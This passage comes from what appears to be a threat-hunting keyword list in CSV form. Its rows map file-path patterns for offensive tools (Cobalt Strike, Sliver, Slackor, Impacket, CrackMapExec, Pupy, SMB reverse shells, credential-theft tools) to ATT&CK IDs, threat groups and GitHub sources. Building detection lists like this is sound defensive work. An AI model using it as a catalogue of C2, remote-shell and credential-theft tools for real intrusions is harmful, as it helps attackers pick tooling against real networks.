pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/skelsec/pypykatz,1,1,N/A,10,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/skypev2-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Slackor.git*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/Slackor/*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/sleep_python_bridge/*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/Sleeper/Sleeper.cna*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/sleepmask.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/SlinkyCat.git*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,1,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*/sliver.git*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver.pb.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver.proto*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver/evasion/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/sliver-server*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team 
framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/smb.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/smb/psexec.rb*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/SMB_RPC/*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/smb2-capabilities.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb2-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb2-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb2-vuln-uptime.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb3.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/smb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-cmds.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/smb-double-pulsar-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SMBeagle*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*/smb-enum-domains.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-groups.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-services.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-sessions.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-shares.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smbexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/smbexec.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/smb-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SMBForwarder.txt*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/SMBGhost/scanner.py*,offensive_tool_keyword,SMBGhost,Simple scanner for CVE-2020-0796 - SMBv3 RCE.,T1210 - T1573 - T1553 - T1216 - T1027,TA0006 - TA0011 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ollypwn/SMBGhost,1,1,N/A,N/A,7,647,206,2020-10-01T08:36:29Z,2020-03-11T15:21:27Z -*/SMBGhost_RCE*,offensive_tool_keyword,SMBGhost_RCE_PoC,RCE PoC for CVE-2020-0796 SMBGhost,T1210 - T1059 - T1505 - T1021 - T1027,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Exploitation tools,https://github.com/chompie1337/SMBGhost_RCE_PoC,1,1,N/A,N/A,10,1264,355,2020-07-02T18:51:47Z,2020-06-02T00:14:47Z -*/smbldap.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/smb-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smbmap.git*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*/smbmapDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/smb-mbenum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-os-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-print-text.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-protocols.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-psexec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-reverse-shell*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*/smb-security-mode.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smbserver/smb_server.py*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*/smb-server-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/smb-signing-disabled-hosts.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/smbspider.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/smbsr.db*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*/SMBSR.git*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*/smbsr.log*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*/smb-system-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for 